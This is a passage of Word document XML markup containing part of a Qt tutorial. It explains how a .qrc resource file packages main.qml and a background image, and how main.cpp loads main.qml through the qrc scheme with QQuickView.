          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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background.png</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>files will be packaged as resource files. This is done in the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example.qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resource collection</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:</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dec"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE RCC&gt;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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;RCC</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"1.0"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;qresource</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;file&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/file&gt;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;file&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>images/background.png</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/file&gt;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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/qresource&gt;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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/RCC&gt;</w:t>
      </w:r>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Since</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background.png</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a resource file,</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can refer to it using the relative path</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> specified in</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example.qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="00690F6E"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90F6E">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// main.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.3</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image</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source</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"images/background.png"</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To allow QML to locate resource files correctly, the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main.cpp</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads the main QML file,</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main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as a resource file </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0093237B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scheme</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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argv</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QApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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view</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setSource</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc:/main.qml"</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view</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show</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    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
